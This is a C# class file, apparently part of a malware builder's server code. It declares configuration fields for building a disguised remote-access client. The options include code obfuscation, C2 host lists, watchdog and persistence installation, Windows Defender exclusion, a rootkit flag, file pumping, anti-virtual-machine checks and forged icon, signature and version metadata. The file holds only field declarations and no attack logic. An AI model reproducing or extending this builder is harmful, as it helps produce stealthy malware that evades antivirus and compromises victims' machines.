83 lines
1.1 KiB
C#
83 lines
1.1 KiB
C#
namespace Server.Data;
|
|||
|
|
|
||
|
|
public class BulidData
|
||
|
|
{
|
||
|
|
public bool ctrflow;
|
||
|
|
|
||
|
|
public bool Rename;
|
||
|
|
|
||
|
|
public bool Junk;
|
||
|
|
|
||
|
|
public bool ProxyStr;
|
||
|
|
|
||
|
|
public bool ProxyCall;
|
||
|
|
|
||
|
|
public bool ProxyInt;
|
||
|
|
|
||
|
|
public bool ManyProxy;
|
||
|
|
|
||
|
|
public bool Mixcer;
|
||
|
|
|
||
|
|
public bool ProtectInt;
|
||
|
|
|
||
|
|
public string[] Hosts;
|
||
|
|
|
||
|
|
public string Group;
|
||
|
|
|
||
|
|
public string Mutex;
|
||
|
|
|
||
|
|
public bool Install;
|
||
|
|
|
||
|
|
public bool InstallWatchDog;
|
||
|
|
|
||
|
|
public bool UseInstallAdmin;
|
||
|
|
|
||
|
|
public bool ExclusionWD;
|
||
|
|
|
||
|
|
public bool HiddenFile;
|
||
|
|
|
||
|
|
public bool RootKit;
|
||
|
|
|
||
|
|
public bool Pump;
|
||
|
|
|
||
|
|
public bool UserInit;
|
||
|
|
|
||
|
|
public string TaskClient;
|
||
|
|
|
||
|
|
public string TaskWatchDog;
|
||
|
|
|
||
|
|
public string PathClientCmb;
|
||
|
|
|
||
|
|
public string PathClientBox;
|
||
|
|
|
||
|
|
public string PathWatchDogCmb;
|
||
|
|
|
||
|
|
public string PathWatchDogBox;
|
||
|
|
|
||
|
|
public bool CheckIcon;
|
||
|
|
|
||
|
|
public bool CheckAssembly;
|
||
|
|
|
||
|
|
public bool DigitalSignature;
|
||
|
|
|
||
|
|
public bool AntiVirtual;
|
||
|
|
|
||
|
|
public byte[] Icon;
|
||
|
|
|
||
|
|
public string Product;
|
||
|
|
|
||
|
|
public string Description;
|
||
|
|
|
||
|
|
public string Company;
|
||
|
|
|
||
|
|
public string Copyright;
|
||
|
|
|
||
|
|
public string Trademarks;
|
||
|
|
|
||
|
|
public string OriginalFilename;
|
||
|
|
|
||
|
|
public string ProductVersion;
|
||
|
|
|
||
|
|
public string FileVersion;
|
||
|
|
}
|